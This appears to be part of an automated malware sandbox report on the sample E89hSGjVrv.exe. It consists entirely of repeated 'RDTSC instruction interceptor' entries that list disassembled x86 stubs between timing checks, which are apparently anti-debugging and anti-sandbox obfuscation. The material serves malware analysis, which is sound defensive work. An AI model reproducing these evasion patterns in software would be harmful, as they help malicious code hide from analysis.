              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F18D25 second address: F18D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 654335BFh 0x0000000d mov dword ptr [ebp+122D1AA3h], edx 0x00000013 mov dword ptr [ebp+122D1B1Eh], ecx 0x00000019 lea ebx, dword ptr [ebp+1244C894h] 0x0000001f js 00007F50492D8197h 0x00000025 xchg eax, ebx 0x00000026 push edi 0x00000027 push eax 0x00000028 push edx 0x00000029 push edx 0x0000002a pop edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F18D51 second address: F18D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F397F4 second address: F397FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F397FA second address: F3980B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5048C0A32Ah 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F3980B second address: F39811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F0C726 second address: F0C73B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A331h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F376DA second address: F376DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F379C3 second address: F379E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F5048C0A326h 0x00000009 jmp 00007F5048C0A335h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F379E3 second address: F37A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007F50492D81BDh 0x0000000d jmp 00007F50492D81A9h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F37A0D second address: F37A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F37DF5 second address: F37DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F37DF9 second address: F37E04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F37E04 second address: F37E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F50492D8196h 0x0000000a ja 00007F50492D8196h 0x00000010 jmp 00007F50492D819Ch 0x00000015 popad 0x00000016 jmp 00007F50492D819Fh 0x0000001b js 00007F50492D8198h 0x00000021 push eax 0x00000022 push edx 0x00000023 jp 00007F50492D8196h 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F37F99 second address: F37FAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F5048C0A326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007F5048C0A326h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F37FAE second address: F37FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F37FB4 second address: F37FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5048C0A339h 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F38271 second address: F38275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F38275 second address: F3827B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F3827B second address: F38286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F38286 second address: F382A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5048C0A338h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F382A8 second address: F382D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D819Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F50492D81A6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F382D1 second address: F382D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F386E1 second address: F386E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F386E9 second address: F3870F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F5048C0A32Fh 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jno 00007F5048C0A326h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F3870F second address: F38713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F38838 second address: F38847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007F5048C0A326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F38847 second address: F3885D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F50492D819Eh 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F3885D second address: F38863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F02571 second address: F02577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F02577 second address: F025A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A336h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5048C0A330h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F025A3 second address: F025A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F38F52 second address: F38F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F5048C0A326h 0x0000000f jng 00007F5048C0A326h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F3E407 second address: F3E40B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F040C0 second address: F040E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5048C0A32Eh 0x0000000a ja 00007F5048C0A326h 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F5048C0A32Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F42476 second address: F424A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F50492D81A1h 0x0000000a js 00007F50492D8196h 0x00000010 popad 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 push eax 0x00000018 pushad 0x00000019 popad 0x0000001a pop eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F40EB8 second address: F40ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 jmp 00007F5048C0A334h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F40ED9 second address: F40EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F425B6 second address: F425DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5048C0A335h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F5048C0A32Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F425DB second address: F425DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F42767 second address: F4276B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F4580B second address: F4582C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D819Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F50492D819Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F4582C second address: F4585D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A334h 0x00000007 jmp 00007F5048C0A331h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F5048C0A326h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F48FCD second address: F48FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F48FD1 second address: F48FD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F48FD7 second address: F48FE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F50492D8196h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F49EB8 second address: F49EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F49F51 second address: F49FAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D81A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F50492D8198h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 jns 00007F50492D81B0h 0x0000002a xchg eax, ebx 0x0000002b pushad 0x0000002c pushad 0x0000002d push edi 0x0000002e pop edi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F49FAE second address: F49FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F5048C0A32Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F49FC7 second address: F49FD1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F50492D819Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F4A4DE second address: F4A4E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F4A4E4 second address: F4A4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F4A4E8 second address: F4A4EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F4A4EC second address: F4A4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F4D5DE second address: F4D616 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D1836h], eax 0x00000010 mov edi, dword ptr [ebp+122D38B6h] 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D33F2h], ebx 0x0000001e mov dword ptr [ebp+122D1B47h], eax 0x00000024 push 00000000h 0x00000026 movzx esi, bx 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jnl 00007F5048C0A32Ch 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F4D616 second address: F4D620 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F50492D819Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F4E0AB second address: F4E0B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F4E0B0 second address: F4E10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F50492D819Bh 0x0000000d nop 0x0000000e push esi 0x0000000f call 00007F50492D81A2h 0x00000014 sbb edi, 5BDE0923h 0x0000001a pop esi 0x0000001b pop edi 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007F50492D8198h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 push 00000000h 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F4E10E second address: F4E112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F4E112 second address: F4E118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F4EBC7 second address: F4EBCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F4E904 second address: F4E90A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F4EBCB second address: F4EBD1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F4E90A second address: F4E90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F4E90E second address: F4E912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F4FDF5 second address: F4FE06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D819Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F552E4 second address: F552F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A32Ah 0x00000007 jg 00007F5048C0A326h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F552F8 second address: F55302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F50492D8196h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F55302 second address: F55306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F558F6 second address: F558FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F558FA second address: F55900 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F55900 second address: F5590A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F50492D8196h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5692F second address: F56939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F5048C0A326h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F56939 second address: F5694B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jc 00007F50492D819Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5694B second address: F56954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F55AF2 second address: F55AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F59AD1 second address: F59AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F58C24 second address: F58C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5AA78 second address: F5AA7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F59D29 second address: F59D37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F59D37 second address: F59D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5BBA5 second address: F5BBB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5BBB1 second address: F5BBB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5BBB7 second address: F5BBBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5BE7B second address: F5BE81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5BE81 second address: F5BE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5DC21 second address: F5DC25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5DC25 second address: F5DC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5DC33 second address: F5DC39 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5EBD7 second address: F5EBF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D81A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5FB47 second address: F5FBCF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5048C0A328h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1D5Ch], ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F5048C0A328h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f jmp 00007F5048C0A32Ah 0x00000034 mov ebx, dword ptr [ebp+122D36BAh] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007F5048C0A328h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 0000001Bh 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 jmp 00007F5048C0A336h 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e jns 00007F5048C0A328h 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F61B2A second address: F61B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F50492D81A0h 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
